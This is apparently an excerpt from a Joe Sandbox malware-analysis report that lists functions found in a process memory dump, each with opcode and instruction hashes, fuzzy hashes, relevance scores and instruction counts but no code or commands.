                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e68de43ab8aa552f32a57c7e43006f76d850ec5e9e642a29a33b2b703484eb04
                          • Instruction ID: f54e099bf0fe27090e6f4339ad194f851a649a40dc20f2196ec4b7e5b458a05f
                          • Opcode Fuzzy Hash: e68de43ab8aa552f32a57c7e43006f76d850ec5e9e642a29a33b2b703484eb04
                          • Instruction Fuzzy Hash: DC21A170A0974E8FDB69EFA884691B97BA0FF58301F0101BFD419C71B2DA346540C741
                          Function 00007FFD9B78C7D3 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a32adada2689ff59440e6e179e35593bc7caf6c25dc7ff686273dc31db6b89b
                          • Instruction ID: a618c53c123b0473099eef93d9ffcfd5da341f8f0b49bed3254b6aa2c0269080
                          • Opcode Fuzzy Hash: 4a32adada2689ff59440e6e179e35593bc7caf6c25dc7ff686273dc31db6b89b
                          • Instruction Fuzzy Hash: BA11E339B5EB9A8FD745AB68E8652F97BA0EF46212F0505BFC408C70A2C6342514C351
                          Function 00007FFD9B792701 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f40c748378f4743a7f9f16ec22eaee4548ca0f20460e4f1007e03fb79e104ec
                          • Instruction ID: ee25f493942a6988d7f1dc7e0797b8e10cc78ef53d24d189de46fd0c8e11d637
                          • Opcode Fuzzy Hash: 7f40c748378f4743a7f9f16ec22eaee4548ca0f20460e4f1007e03fb79e104ec
                          • Instruction Fuzzy Hash: 0411C43090964E8EEB52BBB488585FA7BF4EF19301F0509B2E418C70B6EA34A284C701
                          Function 00007FFD9B794D99 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c02da0ce756ba10a332cdf5b0fdc603bb33fcbe6a1b75907e9c40674b3560800
                          • Instruction ID: 901f94a2dbf60cfccbdc207201792f7df37301103ce247137820144b35256a1a
                          • Opcode Fuzzy Hash: c02da0ce756ba10a332cdf5b0fdc603bb33fcbe6a1b75907e9c40674b3560800
                          • Instruction Fuzzy Hash: 9B11BE35A0AB8E4FEB69EB6488692B97BF0FF19300F0505BED419C31B2DA3466408701
                          Function 00007FFD9B78CC40 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4e5fd2858d09a05e6fa6761fbf6d72c0243ac6437243ad542c319b5bcdac22c8
                          • Instruction ID: 6efdbdcbabbb18c34ac1ea40bf25e64f30a11ada63945324e45801e7661106eb
                          • Opcode Fuzzy Hash: 4e5fd2858d09a05e6fa6761fbf6d72c0243ac6437243ad542c319b5bcdac22c8
                          • Instruction Fuzzy Hash: F6118230A09A0E8EEBA8EF6884656BD76A0FF29345F10067AE42DD21F5DE35B150C740
                          Function 00007FFD9B792E75 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e07a73e8a4a893d4c56c12ab49888e72dd626ac6a0a65d69abe36f9f87dd0f1
                          • Instruction ID: 3d67fa900e1dab979d98569181f5fbcca3f79325b7766d6d800656c29d07f109
                          • Opcode Fuzzy Hash: 7e07a73e8a4a893d4c56c12ab49888e72dd626ac6a0a65d69abe36f9f87dd0f1
                          • Instruction Fuzzy Hash: 2F117031E09A4E9FEB55FBA488A95B977E0FF19301F0105B6D418C30B6EA34A5848740
                          Function 00007FFD9B794B4D Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13430671cbe357f7330e542bee3014bc3c99d716d70701e5ceee1490e7169f9f
                          • Instruction ID: 8b8d1551cf81e83d0742c0548c05cb19211f7490472eb73c98eab77da809445c
                          • Opcode Fuzzy Hash: 13430671cbe357f7330e542bee3014bc3c99d716d70701e5ceee1490e7169f9f
                          • Instruction Fuzzy Hash: D9118F70A0964E8FEB64EFA488696B977F0FF18308F0106BED41DC35A6DE346540C701
                          Function 00007FFD9B7811AD Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce7ec1163d0163dafae0fd8f27f551037799aecc39407f7fc3df09c7b712c0bb
                          • Instruction ID: a4c0cb502523dd3c75cb7f7af665bcf4d36dcb3c36aa14e70f4a05b8c6356b62
                          • Opcode Fuzzy Hash: ce7ec1163d0163dafae0fd8f27f551037799aecc39407f7fc3df09c7b712c0bb
                          • Instruction Fuzzy Hash: 8411B671E0AA4E4FEB65DBA484B96B97BE0EF59302F1105BEC01AC74F1DE356644C700
                          Function 00007FFD9B78AB48 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aeb875cd12c2aa4068272da8ae1042ffab7937907f40cad903c06f2c0c3b8ef2
                          • Instruction ID: fdc8166d1c1d9873c99319fdc34a30524936f08a8a760385e0181157a6e24940
                          • Opcode Fuzzy Hash: aeb875cd12c2aa4068272da8ae1042ffab7937907f40cad903c06f2c0c3b8ef2
                          • Instruction Fuzzy Hash: 29110D30A19A0E9FDB98EF68C4595BD77B0FF68305F11057AE41AD35A4DA34A550C740
                          Function 00007FFD9B795E39 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 517a5cdc6ed4bcfbc2137622a2529c5081e3169d2f0fa7b48360a10e0a115520
                          • Instruction ID: 0961218f472c1048bfe0c30d4891e51c0876ae67fd2d64f9e2bce30c6fa13836
                          • Opcode Fuzzy Hash: 517a5cdc6ed4bcfbc2137622a2529c5081e3169d2f0fa7b48360a10e0a115520
                          • Instruction Fuzzy Hash: EC115131E0AB9E8EE751AB7488696A97BF0FF15300F4505B6D41CCB0B6EA34A544C711
                          Function 00007FFD9B78BB35 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0eee904c87377849c89bc7246d907fcdf560dc007526f33ffdc7ec6bd2df77b8
                          • Instruction ID: 6007257e93b6916e3aae6acb97b8978435c491ed619084189ad4910939072631
                          • Opcode Fuzzy Hash: 0eee904c87377849c89bc7246d907fcdf560dc007526f33ffdc7ec6bd2df77b8
                          • Instruction Fuzzy Hash: 34118230A09A4E8FDB94EF64C8A86BD7BF0FF18301F1105BAD419C71B6DA359640C700
                          Function 00007FFD9B794D0D Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ffac0ac12857d1816a1336a702ddd2c94126ce79f76383665c6380bd7313ea1
                          • Instruction ID: 6a38bdbcadee8d7f583f81566f9c89c0f78d17bfbbcdaadbdddd129ccc99a0f5
                          • Opcode Fuzzy Hash: 2ffac0ac12857d1816a1336a702ddd2c94126ce79f76383665c6380bd7313ea1
                          • Instruction Fuzzy Hash: A411C130A0964E4FEB65EB6484696B977E0FF28304F0105BED42DC61F2DF34A240C701
                          Function 00007FFD9B782E41 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a7282ddaeb0d2a37192539fe5b066d6acc4bdd7f8c91c9da6b2c9f3de7abdd4
                          • Instruction ID: 55f4727bdaa08080e148376e37aaacd207a5225cf8827f51ecafc9c4811b8a03
                          • Opcode Fuzzy Hash: 2a7282ddaeb0d2a37192539fe5b066d6acc4bdd7f8c91c9da6b2c9f3de7abdd4
                          • Instruction Fuzzy Hash: CA018831E1AA4E5FE761ABA4849C5A976E0FF59302F1246B6D418C60F6EE34E6548600
                          Function 00007FFD9B794F35 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d99feb97f81d2241b2b637c4aba9b94b599c68c41b2f0fb567cedf68e6d52234
                          • Instruction ID: e216cd4ade74dfdec788bb47c3eeef3ac8a9a87044e81e596f495f71d3ae7490
                          • Opcode Fuzzy Hash: d99feb97f81d2241b2b637c4aba9b94b599c68c41b2f0fb567cedf68e6d52234
                          • Instruction Fuzzy Hash: 9A01F530A1968E8FD761EBA488685E937E1FF18300F0605BAD418C71B2EE34E640C700
                          Function 00007FFD9B79348B Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 92c6d8671813bd11d3f90dc39ee13d7600f3c27e357347b86cef3f700a76322e
                          • Instruction ID: af650a555a69029486f11a0a9db8fd7ef922d435dc353e68756377c7899f55d7
                          • Opcode Fuzzy Hash: 92c6d8671813bd11d3f90dc39ee13d7600f3c27e357347b86cef3f700a76322e
                          • Instruction Fuzzy Hash: 4B11A331A09A4E8EE762EBA888695B9B6E0FF14300F0706B5D428C60F2EE34A6448751
                          Function 00007FFD9B7805D8 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2e601c32004e3e864e3e43088a71571f9408e9e7eb617794a60d449a96ea5f9
                          • Instruction ID: c1048f38c98fa595d3aaeb3f60d7d4dba581f5e738a871a52782c8e8c9e5f23c
                          • Opcode Fuzzy Hash: e2e601c32004e3e864e3e43088a71571f9408e9e7eb617794a60d449a96ea5f9
                          • Instruction Fuzzy Hash: 9A018030A0AA0E8EEB58EF64C0A56B977A1FF58305F11457AD40EC35F5DA31A650C740
                          Function 00007FFD9B78FF2F Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93382b4ab8d0dc9f46c5bb3e5c7979fe611cd11d59bfbc182536cc22a6315b69
                          • Instruction ID: 7f858ade5fd20cf16b601f3269a07975b921049f93de1b525bea449834d52328
                          • Opcode Fuzzy Hash: 93382b4ab8d0dc9f46c5bb3e5c7979fe611cd11d59bfbc182536cc22a6315b69
                          • Instruction Fuzzy Hash: D8111F71E05A1E8ADBA8DF2488957ADB7B1EF58301F1041F9911DD32A6DE745EC18F40
                          Function 00007FFD9B78ACE8 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2bc8c8ac49e06abe45f30bb2a4153bff157974b6ff619c9382212a3345b9a05e
                          • Instruction ID: 674ca3312b49fd25eb60b8c2d00bd225408683daa185da91c6daaad6fbee6ed1
                          • Opcode Fuzzy Hash: 2bc8c8ac49e06abe45f30bb2a4153bff157974b6ff619c9382212a3345b9a05e
                          • Instruction Fuzzy Hash: B7015230A19A0E9EDB54EFA4C4A86BD77E0FF18305F51057AD41DC21B5DE316650CB00
                          Function 00007FFD9B78ACA8 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a307376ed97ba913e49bd51750cd99f2ed4d0c330cd2a7145c981e44e579787c
                          • Instruction ID: 9cae6c4c27aa0a574e45ec07c3ddef7541410d8b80be1f61ff80aa0eaaa718c8
                          • Opcode Fuzzy Hash: a307376ed97ba913e49bd51750cd99f2ed4d0c330cd2a7145c981e44e579787c
                          • Instruction Fuzzy Hash: AB01BC30A09A0E8FDB58EF64C0A96BA37A1FF58306F61017AE41EC25B4CA31A251C781
                          Function 00007FFD9B790CA0 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e27619803861bcdb737a04f73b7e576516e232078a770e26e4e7a390bc9b0008
                          • Instruction ID: 13dc2793972a90336217c48cfb0fd1259accf176b10539f1763aa016747cd32a
                          • Opcode Fuzzy Hash: e27619803861bcdb737a04f73b7e576516e232078a770e26e4e7a390bc9b0008
                          • Instruction Fuzzy Hash: 6A011A30A15A1E8EEB94EBA4D4686FE76E0FF29305F11097AD42ED21B5DA31A650CB40
                          Function 00007FFD9B78C93D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3b576e5153a170ff758f46da8ddfb741b512cdba25e980f3af1c971780b9e98
                          • Instruction ID: e57188a849364ed992e7d8c7046ce0be608a03904ef0a46b7345ffd0a2015bca
                          • Opcode Fuzzy Hash: e3b576e5153a170ff758f46da8ddfb741b512cdba25e980f3af1c971780b9e98
                          • Instruction Fuzzy Hash: 1A014F70E1960E9EEBA0EBB8D8586BD77F4FF18305F110A7AD419D31B5EE34A6408740
                          Function 00007FFD9B782EB9 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb52c3204ccc01bfe71851fb1aa376fde3367977bea036c206bd4fea202c9bf1
                          • Instruction ID: b7143f8b0a65381ae6dac86fa61a5d055e1d8094326016c1712a6108d555effb
                          • Opcode Fuzzy Hash: cb52c3204ccc01bfe71851fb1aa376fde3367977bea036c206bd4fea202c9bf1
                          • Instruction Fuzzy Hash: C4017131E1EA4E5FE751ABA488A95A93BE0EF19312F5606F6D418C70F6EA38A544C700
                          Function 00007FFD9B78281D Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1701fb477d5b4d52ca81d01704b0fb7150062ff93d69d2b84f20269e65e89202
                          • Instruction ID: bc518529501b93d6d338636b6d15f0e49ca566dcd1a44d6ab855b7746fa3cf99
                          • Opcode Fuzzy Hash: 1701fb477d5b4d52ca81d01704b0fb7150062ff93d69d2b84f20269e65e89202
                          • Instruction Fuzzy Hash: 6701D831E0AA4E4FEB51EBA4949C5A97BE0EF15302F4206B6D408C70B5DA34E5408700
                          Function 00007FFD9B781C35 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a1be3c7887b6cc4560c63dc04a556ef34cbff8dd2376ac0941b574c473a8fd2
                          • Instruction ID: 75fff80632da973eca926336da4914dd045900db669f28735f2aeabc7084d816
                          • Opcode Fuzzy Hash: 4a1be3c7887b6cc4560c63dc04a556ef34cbff8dd2376ac0941b574c473a8fd2
                          • Instruction Fuzzy Hash: CF01D630A0EB8E8FEB94DF6484652B97BA1FF19301F41057AD408C74F1DB759550C740
                          Function 00007FFD9B78A909 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3593aeb040ded3999c5d03c38694ff85d0ac9f6ef7b39006f845d9fdf745c21
                          • Instruction ID: 847c1671ae540d7c6f552aee63f02dbd21f2619c6db851964263d3b27a052530
                          • Opcode Fuzzy Hash: c3593aeb040ded3999c5d03c38694ff85d0ac9f6ef7b39006f845d9fdf745c21
                          • Instruction Fuzzy Hash: AA018431A4EB8E4FE762EB7488A95A97BF0EF15301F0746F2D008C70B2EA38A5448741
                          Function 00007FFD9B780608 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ff7e6f393a8343a79cd212861672830e6a33ad9bad143ccfe30c66a910e8de1
                          • Instruction ID: 5c7ff537545182e8ce124590b1228a5d7af1149230c6380345acda52149af59d
                          • Opcode Fuzzy Hash: 0ff7e6f393a8343a79cd212861672830e6a33ad9bad143ccfe30c66a910e8de1
                          • Instruction Fuzzy Hash: EC018130A15A0E9FEB59EBA4C4A86B973E0FF19306F51097ED41EC21F5DE35A650CA40
                          Function 00007FFD9B780610 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff8eeec5053965c091078e1c0feccdf7c37c8d265da8266a06dd25172d424596
                          • Instruction ID: bae7a0e9abcb131c7ce28fa62e4fe9e5595cc9c9dfa58b9903ced6a5d011a4b6
                          • Opcode Fuzzy Hash: ff8eeec5053965c091078e1c0feccdf7c37c8d265da8266a06dd25172d424596
                          • Instruction Fuzzy Hash: 72018630A19A0E9AEB58EBA4C4A85B973E0FF18307F51057ED41EC21F5DE35A550CB10
                          Function 00007FFD9B790C81 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b8c9b088705c4bee8f85fd8606d8946b120d2b97d994f96efd5bfe6f0f2c9bd
                          • Instruction ID: ef27254312f944a9aeb523afca7af4a4c74407c7f4b40c8dc0aaae211b4f1dde
                          • Opcode Fuzzy Hash: 2b8c9b088705c4bee8f85fd8606d8946b120d2b97d994f96efd5bfe6f0f2c9bd
                          • Instruction Fuzzy Hash: C9F08131A1AB9E4FEB94AF6488682FE7BA0FF15701F02057BD828C21B1EB3496508700
                          Function 00007FFD9B78A9D8 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57a4823c085a329a49adebc53f488e8f9357c6d7db884ea128ed4d5b6c5aaeaa
                          • Instruction ID: d96c9ee9bd6791c525dd41a41dbe4d8029dbdb0ef850932aa422d8a1dc80f8fc
                          • Opcode Fuzzy Hash: 57a4823c085a329a49adebc53f488e8f9357c6d7db884ea128ed4d5b6c5aaeaa
                          • Instruction Fuzzy Hash: 0EF0D130A4660E8BEB5CFBA0C4256B936A0FF18304F12097AE41ED20F1DE316250C600
                          Function 00007FFD9B7805D0 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4aff9583db81b2f20c67af90727dc28e8f5eb0b1811657e6e107465eb4fc3a5
                          • Instruction ID: d48a84d99eabe8bd876072002c1b89c3bb88dad3d7b36751f69d12d13f00f10a
                          • Opcode Fuzzy Hash: a4aff9583db81b2f20c67af90727dc28e8f5eb0b1811657e6e107465eb4fc3a5
                          • Instruction Fuzzy Hash: 88F0C230A0AA4E8FEB54EE6894656FA37A0FF19305F11057AE80DC34F1DF35A650CB80
                          Function 00007FFD9B7811C0 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f2baecbe095bd040203103c7e71950421c328b402720770f7e5cc5ca550a9cc
                          • Instruction ID: 4500f943580d104b17a943abb88d528466077c9ab2c90e2f7012bd3b68df5470
                          • Opcode Fuzzy Hash: 7f2baecbe095bd040203103c7e71950421c328b402720770f7e5cc5ca550a9cc
                          • Instruction Fuzzy Hash: 1DF0C271E0AB5E4AFBA49BE498A92F977E0FF59306F01017AD41EC64F1EE342754C640
                          Function 00007FFD9B78BF89 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e6e2740055e9dab32d88b9a393ece078791289f2ae14ec14bcf6ade3865bb00
